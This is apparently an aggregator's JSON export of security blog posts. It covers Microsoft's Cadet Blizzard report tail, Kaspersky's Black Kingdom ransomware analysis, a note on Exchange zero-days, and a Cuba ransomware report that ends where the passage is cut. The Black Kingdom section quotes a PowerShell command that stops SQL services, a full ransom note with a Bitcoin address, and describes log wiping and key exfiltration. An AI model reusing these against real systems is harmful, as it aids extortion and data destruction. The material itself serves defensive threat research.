above.\n\n * [Web Shell Activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web Shells Threat Protection/Hunting Queries/WebShellActivity.yaml>)\n * [Commands executed by WMI](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows Security Events/Hunting Queries/CommandsexecutedbyWMIonnewhosts-potentialImpacket.yaml>)\n * [Potential Impacket Execution](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker Tools Threat Protection Essentials/Hunting Queries/PotentialImpacketExecution.yaml>)\n * [Dumping LSASS using procdump](<https://github.com/Azure/Azure-Sentinel/blob/ccbb0e644810e0edf3b8ee4f284fd05ea1cc46ad/Hunting%20Queries/Microsoft%20365%20Defender/Credential%20Access/procdump-lsass-credentials.yaml>)\n * [Potential Microsoft Defender Tampering](<https://github.com/Azure/Azure-Sentinel/blob/c5e3281a8a30ea658ce8f8234a182a63ceb996d7/Hunting%20Queries/Microsoft%20365%20Defender/Defense%20evasion/PotentialMicrosoftDefenderTampering%5BSolarigate%5D.yaml>)\n\n### References\n\n * <https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>\n * <https://github.com/flozz/p0wny-shell>\n * <https://github.com/sensepost/reGeorg>\n * <https://cert.gov.ua/article/3947787>\n * <https://github.com/fortra/impacket>\n * <https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>\n\n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.\n\nThe post [Cadet Blizzard emerges as a novel and distinct Russian threat actor](<https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-14T16:00:00", "type": "mssecure", "title": "Cadet Blizzard emerges as a novel and distinct Russian threat actor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-26084", "CVE-2021-4034", "CVE-2022-41040"], "modified": "2023-06-14T16:00:00", "id": "MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "href": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-06-17T10:31:39", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/17094158/abstract_digital_castle-990x400.jpg)\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nThe complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and a possibility to recover files encrypted with Black Kingdom with the help of the hardcoded key. The industry already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover encrypted files in case they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as [ProxyLogon](<https://proxylogon.com/>) was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on another ransomware family used by the attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server. The ransomware family was DearCry.\n\nAnalysis of Black Kingdom revealed that, compared to others, it is an amateurish implementation with several mistakes and a critical encryption flaw that could allow decrypting the files due to the use of a hardcoded key. Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom's past activity indicates that ransomware was used in larger vulnerability exploitations campaigns related to Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.\n\n### Sleep parameters\n\nThe ransomware can be executed without parameters and will start to encrypt the system, however, it is possible to to run Black Kingdom with a number value, which it will interpret as the number of seconds to wait before starting encryption.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_'Sleep' parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic was coded into a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption. The purpose is to avoid breaking the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. The developers failed to use OS environments or regex to avoid repeating the code twice.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop all processes in the system that contain "sql" in the name with the following command:\n \n \n Get-Service*sql*|Stop-Service-Force2>$null\n\nOnce done, Black Kingdom will delete the PowerShell history in the system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with a cleanup of system logs, this supports the theory that the attackers try to remain hidden in the system by removing all traces of their activity.\n\n### Encryption process\n\nThe static analysis of Black Kingdom shows how it generates an AES-256 key based on the following algorithm.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for AES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. If the connection is unsuccessful, the Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection with hxxp://mega.io.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\n** **The credentials for mega.io are hardcoded in base64 and used for connecting as shown below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contained the following data.\n\n**Parameter** | **Description:** \n---|--- \nID: | Generated ID for user identification \nKey: | Generated user key \nUser: | Username in the infected system \nDomain: | Domain name to which the infected user belongs \n \nBlack Kingdom will encrypt a single file if it is passed as a parameter with the key to encrypt it. This could allow the attacker to encrypt one file instead of encrypting the entire system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are used, the ransomware will start to enumerate files in the system and then encrypt these with a ten-threaded process. It performs the following basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom allows reading a file in the same directory called target.txt, which will be used by the ransomware to recursively collect files for the collected directories specified in that file and then encrypt them. Black Kingdom will also enumerate various drive letters and encrypt them. A rescue note will be delivered for each encrypted directory.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Rescue note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often end up making mistakes that can help decryption, e.g., poor implementation of the encryption key, or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom will try to upload the generated key to Mega, and if this fails, use a hardcoded key to encrypt the files. If the files have been encrypted and the system has not been able to make a connection to Mega, it will be possible to recover the files using the hardcoded keys.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author's implementation of file encryption and found several mistakes that could affect victims directly. During the encryption process, Black Kingdom does not check whether the file is already encrypted or not. Other popular ransomware families normally add a specific extension or a marker to all encrypted files. However, if the system has been infected by Black Kingdom twice, files in the system will be encrypted twice, too, which may prevent recovery with a valid encryption key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation will result in Application, Security, and System event viewer logs being deleted. The purpose is to remove any history of ransomware activity, exploitation, and privilege escalation.\n\n### Ransomware note\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard with pyHook as it does so.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address; sets it apart from other ransomware families, which provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on Github](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry we could see only a few hits by Black Kingdom in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f \nc4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908 \na387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287 \n815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670 \n910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db \n866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc \nc25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = \"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique.** | **Technique Name. ** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n**T1059** | **Command and Scripting Interpreter** \n**T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n**T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1134** | **Access Token Manipulation** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n**T1140** | **Deobfuscate/Decode Files or Information** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1027** | **Obfuscated Files or Information** \n**T1574.002** | **DLL Side-Loading** \n**T1036** | **Masquerading** \n**T1134** | **Access Token Manipulation** \n**T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n**T1082** | **System Information Discovery** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1012** | **Query Registry** \n**T1518.001** | **Security Software Discovery** \n**T1057** | **Process Discovery** \n**T1018** | **Remote System Discovery** \n**T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n**T1005** | **Data from Local System** \n**T1114** | **Email Collection** \n**T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:32:23", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22105659/programming-code-abstract-990x400.jpg)\n\n## What happened?\n\nOn March 2, 2021 several companies [released](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) [reports](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) about in-the-wild exploitation of zero-day vulnerabilities inside Microsoft Exchange Server. The following vulnerabilities allow an attacker to compromise a vulnerable Microsoft Exchange Server. As a result, an attacker will gain access to all registered email accounts, or be able to execute arbitrary code (remote code execution or RCE) within the Exchange Server context. In the latter case, the attacker will also be able to achieve persistence on the infected server.\n\nA total of four vulnerabilities were uncovered:\n\n 1. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). Server-side request forgery (SSRF) allows an attacker without authorization to query the server with a specially constructed request that will cause remote code execution. The exploited server will then forward the query to another destination. \n 2. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) caused by unsafe data deserialization inside the Unified Messaging service. Potentially allows an attacker to execute arbitrary code (RCE). As a result of insufficient control over user files, an attacker is able to forge a body of data query, and trick the high-privilege service into executing the code.\n 3. [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>). This vulnerability allows an authorized Exchange user to overwrite any existing file inside the system with their own data. To do so, the attacker has to compromise administrative credentials or exploit another vulnerability such as SSRF CVE-2021-26855.\n 4. [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is similar to CVE-2021-26858 and allows an authorized attacker to overwrite any system file on the Exchange server. \n\nKaspersky [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) shows that these vulnerabilities are already used by cybercriminals around the world.\n\n_Geography of attacks with mentioned MS Exchange vulnerabilities (based on KSN statistics) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>))_\n\nWe predict with a high degree of confidence that this is just the beginning, and we anticipate numerous exploitation attempts with the purpose of gaining access to resources inside corporate perimeters. Furthermore, we should note that there is typically a high risk of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) infection and/or data theft connected to such attacks. \n\n## How to protect against this threat?\n\nOur products protect against this threat with [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components and detect exploitation with the following verdict: PDM:Exploit.Win32.Generic \nWe detect the relevant exploits with the following detection names:\n\n * Exploit.Win32.CVE-2021-26857.gen\n * HEUR:Exploit.Win32.CVE-2021-26857.a\n\nWe also detect and block the payloads (backdoors) being used in the exploitation of these vulnerabilities, according to our Threat Intelligence. Possible detection names are (but not limited to):\n\n * HEUR:Trojan.ASP.Webshell.gen\n * HEUR:Backdoor.ASP.WebShell.gen\n * UDS:DangerousObject.Multi.Generic\n\nWe are actively monitoring the situation and additional detection logic will be released with updatable databases when required.\n\nOur [Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) helps to identify attacks in early stages by marking such suspicious actions with special IoA tags (and creating corresponding alerts). For example, this is an example of Powershell started by IIS Worker process (w3wp.exe) as a result of vulnerability exploitation: \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr-1024x712.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr.png>)\n\nOur [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service is also able to identify and stop this attack by using threat hunting rules to spot the exploitation itself, as well as possible payload activity.\n\nAnd the thorough research of the attack will soon be available within APT Intelligence Reporting service, please contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>) for details.\n\n## Recommendations\n\n * As Microsoft has already released an update to fix all these vulnerabilities, we strongly recommend updating Exchange Server as soon as possible.\n * Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service which help to identify and stop the attack in the early stages, before the attackers achieve their goals.\n * Use a reliable endpoint security solution such as Kaspersky Endpoint Security for Business that is powered by exploit prevention, behavior detection and a remediation engine that is able to roll back malicious actions. KESB also has self-defense mechanisms that can prevent its removal by cybercriminals.", "cvss3": {}, "published": "2021-03-04T17:20:57", "type": "securelist", "title": "Zero-day vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:20:57", "id": "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "href": "https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-17T09:24:48", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08172822/sl-tropical-beach-cuba-binary-1200-990x400.jpg)\n\n## Introduction\n\nKnowledge is our best weapon in the fight against cybercrime. An understanding of how various gangs operate and what tools they use helps build competent defenses and investigate incidents. This report takes a close look at the history of the Cuba group, and their attack tactics, techniques and procedures. We hope this article will help you to stay one step ahead of threats like this one.\n\n## Cuba ransomware gang\n\n[![Cuba data leak site](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140902/Cuba_ransomware_01-1024x628.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140902/Cuba_ransomware_01.png>)\n\nCuba data leak site\n\nThe group's offensives first got on our radar in late 2020. Back then, the cybercriminals had not yet adopted the moniker "Cuba"; they were known as "Tropical Scorpius".\n\nCuba mostly targets organizations in the United States, Canada and Europe. The gang has scored a series of resonant attacks on oil companies, [financial services](<https://www.bleepingcomputer.com/news/security/us-cities-disclose-data-breaches-after-vendors-ransomware-attack/>), [government agencies](<https://techcrunch.com/2022/08/31/montenegro-ransomware-attack-embassy-warning/>) and healthcare providers.\n\nAs with most cyberextortionists lately, the Cuba gang encrypts victims' files and demands a ransom in exchange for a decryption key. The gang infamously uses complex tactics and techniques to penetrate victim networks, such as exploitation of software vulnerabilities and social engineering. They have been known to use compromised remote desktop (RDP) connections for initial access.\n\nThe Cuba gang's exact origins and the identities of its members are unknown, although some researchers believe it might be a successor to another ill-famed extortion gang, Babuk. The Cuba group, like many others of its kind, is a ransomware-as-a-service (RaaS) outfit, letting its partners use the ransomware and associated infrastructure in exchange for a share of any ransom they collect.\n\nThe group has changed names several times since its inception. We are currently aware of the following aliases it has used:\n\n * ColdDraw\n * Tropical Scorpius\n * Fidel\n * Cuba\n\nThis past February, we came across another name for the gang \u2014 "V Is Vendetta", which deviated from the hackers' favorite Cuban theme. This might have been a moniker used by a sub-group or affiliate.\n\nThere is an obvious connection with the Cuba gang: the newly discovered group's website is hosted in the Cuba domain:\n\n_http[:]//test[.]cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd[.]onion/_\n\n[![Website of V IS VENDETTA](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140959/Cuba_ransomware_02-1024x561.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140959/Cuba_ransomware_02.png>)\n\nWebsite of V IS VENDETTA\n\nCuba remains active as at the time of writing this, and we keep hearing about new extortion victims.\n\n## Victimology\n\n_In this section, we used data consensually provided by our users and information about victims from open sources, such as other security vendors' reports and the data leak site of the ransomware gang itself._\n\nThe group has attacked numerous companies around the world. Industry affiliation does not seem to be a factor: victims have included retailers, financial and logistical services, government agencies, manufacturers, and others. In terms of geography, most of the attacked companies have been located in the United States, but there have been victims in Canada, Europe, Asia and Australia.\n\n[![Geographic distribution of Cuba victims](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141048/Cuba_ransomware_03-1024x550.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141048/Cuba_ransomware_03.png>)\n\nGeographic distribution of Cuba victims\n\n## Ransomware\n\nThe Cuba ransomware is a single file without additional libraries. Samples often have a forged compilation timestamp: those found in 2020 were stamped with June 4, 2020, and more recent ones, June 19th, 1992.\n\n## Cuba extortion model\n\n[![Extortion models](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141130/Cuba_ransomware_04-945x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141130/Cuba_ransomware_04.png>)\n\nExtortion models\n\nFour extortion models exist today in terms of tools used for pressuring the victim.\n\n * Single extortion: encrypting data and demanding a ransom just for decryption.\n * Double extortion: besides encrypting, attackers steal sensitive information. They threaten to both withhold the encryption key and publish the stolen information online unless the victim pays up. This is the most popular model among ransomware gangs today.\n * Triple extortion: adding a threat to expose the victim's internal infrastructure to DDoS attacks. The model became widespread after the LockBit gang got [DDoS'ed](<https://techcrunch.com/2022/08/22/entrust-lockbit-ddos-ransomware/>), possibly by a victim. After getting targeted, the hackers realized that DDoS was an effective pressure tool, something they [stated openly](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/>), setting an example for others. To be fair, [isolated cases of triple extortion](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-add-ddos-attacks-to-their-extortion-arsenal/>) predate the LockBit case.\n * The fourth model is the least common one, as it implies maximum pressure and is thus more costly. It adds spreading news of the breach among the victim's investors, shareholders and customers. DDoS attacks in that case are not necessary. This model is exemplified by the recent [hack of Bluefield University in Virginia](<https://www.bleepingcomputer.com/news/security/ransomware-gang-hijacks-university-alert-system-to-issue-threats/>), where the AvosLocker ransomware gang hijacked the school's emergency broadcast system to send students and staff SMS texts and email alerts that their personal data had been stolen. The hackers urged not to trust the school's management, who they said were concealing the true scale of the breach, and to make the situation public knowledge as soon as possible.\n\nThe Cuba group is using the classic double extortion model, encrypting data with the Xsalsa20 symmetric algorithm, and the encryption key, with the RSA-2048 asymmetric algorithm. This is known as hybrid encryption, a cryptographically secure method that prevents decryption without the key.\n\nCuba ransomware samples avoid encrypting files with the following name extensions: .exe, .dll, .sys, .ini, .lnk, .vbm and .cuba, and the following folders:\n\n * \\windows\\\n * \\program files\\microsoft office\\\n * \\program files (x86)\\microsoft office\\\n * \\program files\\avs\\\n * \\program files (x86)\\avs\\\n * 